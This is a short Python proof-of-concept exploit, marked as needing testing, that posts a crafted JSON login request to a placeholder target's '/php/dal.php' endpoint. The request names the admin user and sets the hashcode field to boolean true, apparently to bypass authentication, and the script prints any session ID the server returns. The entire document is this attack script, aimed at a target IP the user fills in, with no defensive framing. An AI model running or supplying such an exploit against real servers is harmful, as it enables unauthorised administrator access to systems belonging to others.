#testing needed
import requests
import json

def exploit(target_url):
    payload = {
        "mode": "LOGIN",
        "username": "admin",
        "hashcode": True
    }

    headers = {
        "Content-Type": "application/json"
    }

    print(f"[+] Sending payload to {target_url}")
    res = requests.post(target_url, headers=headers, data=json.dumps(payload))

    if res.status_code == 200 and "sessionId" in res.text:
        print("[+] Exploit successful!")
        print(res.json())
    else:
        print("[-] Exploit failed. The server may be patched or unreachable.")

if __name__ == "__main__":
    target = "http://TARGET-IP/php/dal.php"  # Replace with actual IP
    exploit(target)